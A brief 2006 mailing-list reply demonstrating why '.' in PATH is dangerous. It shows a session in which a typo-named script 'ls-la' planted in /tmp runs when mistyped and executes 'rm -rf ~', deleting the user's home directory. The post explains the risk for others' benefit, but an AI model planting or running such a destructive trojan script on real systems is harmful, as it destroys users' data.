On Tue, Apr 04, 2006 at 09:15:58PM +0200, RedShift wrote: > I cannot see how this would be exploitable. root doesn't have . in it's > PATH. Other people were discussing cat and cta for example. For this to > work, one would have to be able to write to the victim's home directory,
$ cd /tmp
$ ls-la
$ cd ~
ksh: /home/joskam: not found
$ cat ls-la
#!/bin/sh
rm -rf ~
$
HTH.
--
Jurjen Oskam
Savage's Law of Expediency:
You want it bad, you'll get it bad.
